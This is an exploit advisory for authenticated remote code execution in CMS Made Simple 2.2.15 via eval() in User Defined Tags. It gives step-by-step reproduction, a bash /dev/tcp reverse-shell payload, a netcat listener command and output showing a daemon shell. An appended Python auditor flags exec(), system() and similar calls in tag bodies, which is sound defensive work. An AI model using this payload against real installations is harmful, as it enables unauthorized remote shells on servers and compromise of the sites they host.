# Exploit Title: CMS Made Simple 2.2.15 - RCE (Authenticated)  
# Author: Andrey Stoykov  
# Vendor Homepage:  
# Software Link:  
# Version: 2.2.15  
# Tested on: Debian 10 LAMPP  
# Exploit and Detailed Info:  
The vulnerability is in "editusertag.php" at line #93, where user input is passed to the PHP eval() function.  
// Vulnerable eval() code  
if (eval('function testfunction'.rand().'() {'.$code."\n}") === FALSE) {  
Reproduction Steps:  
1. Login as administrator user and navigate to Extensions->User Defined Tags  
2. Add code with the payload of:  
exec("/bin/bash -c 'bash -i > /dev/tcp/ 0>&1'");  
3. Click on the newly created User Defined Tag and use the Run function  
RCE will be achieved:  
astoykov@Lubuntu:~$ nc -kvlp 4444  
nc: getnameinfo: Temporary failure in name resolution  
Connection received on 53690  
uid=1(daemon) gid=1(daemon) groups=1(daemon)
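
# Added example (not part of the original advisory, not CMS Made Simple code): a static audit that flags User Defined Tag bodies containing process-spawning PHP constructs such as the exec() call used above. It assumes the tag bodies have already been exported into a name -> code mapping; find_process_calls, audit_tags and the sample tags are hypothetical names and constructed data.

```python
import re

# PHP functions that start an OS process; exec() is the one in the advisory's payload.
PROCESS_FUNCS = ("exec", "system", "passthru", "shell_exec", "popen", "proc_open", "pcntl_exec")

# Comments and quoted strings are blanked first so names inside them are not reported.
_SKIP = re.compile(r"""
      /\*.*?\*/             # block comment
    | (?://|\#)[^\n]*       # line comment
    | '(?:\\.|[^'\\])*'     # single-quoted string
    | "(?:\\.|[^"\\])*"     # double-quoted string
    """, re.S | re.X)

# A bare call: not a method ($o->exec), static call, variable, or longer name (curl_exec).
_CALL = re.compile(r"(?<![\w$>:\\])\\?(%s)\s*\(" % "|".join(PROCESS_FUNCS), re.I)
_BACKTICK = re.compile(r"`[^`]*`")  # PHP shell-execution operator


def _blank(match):
    # Keep newlines so reported line numbers still match the original tag body.
    return re.sub(r"[^\n]", " ", match.group())


def find_process_calls(code):
    """Return sorted (line, construct) pairs for process-spawning constructs in PHP code."""
    stripped = _SKIP.sub(_blank, code)
    hits = [(m.start(), m.group(1).lower() + "()") for m in _CALL.finditer(stripped)]
    hits += [(m.start(), "backticks") for m in _BACKTICK.finditer(stripped)]
    return sorted((stripped.count("\n", 0, pos) + 1, name) for pos, name in hits)


def audit_tags(tags):
    """Map tag name -> findings, keeping only tags that have at least one finding."""
    report = {name: find_process_calls(code) for name, code in tags.items()}
    return {name: hits for name, hits in report.items() if hits}


# Constructed sample tag bodies (not taken from a real site).
SAMPLE_TAGS = {
    "show_date": 'echo date("Y-m-d"); // exec() is mentioned only in this comment',
    "curl_fetch": '$ch = curl_init($url);\n$out = curl_exec($ch);\necho "system(ok)";',
    "diag": '/* added last week */\n$r = array();\nEXEC("id", $r);\necho `uptime`;',
}

if __name__ == "__main__":
    for tag, findings in audit_tags(SAMPLE_TAGS).items():
        print(tag, findings)
```

Calls assembled at run time (variable functions, concatenated names) are not caught by static matching, so an empty result does not prove a tag is harmless.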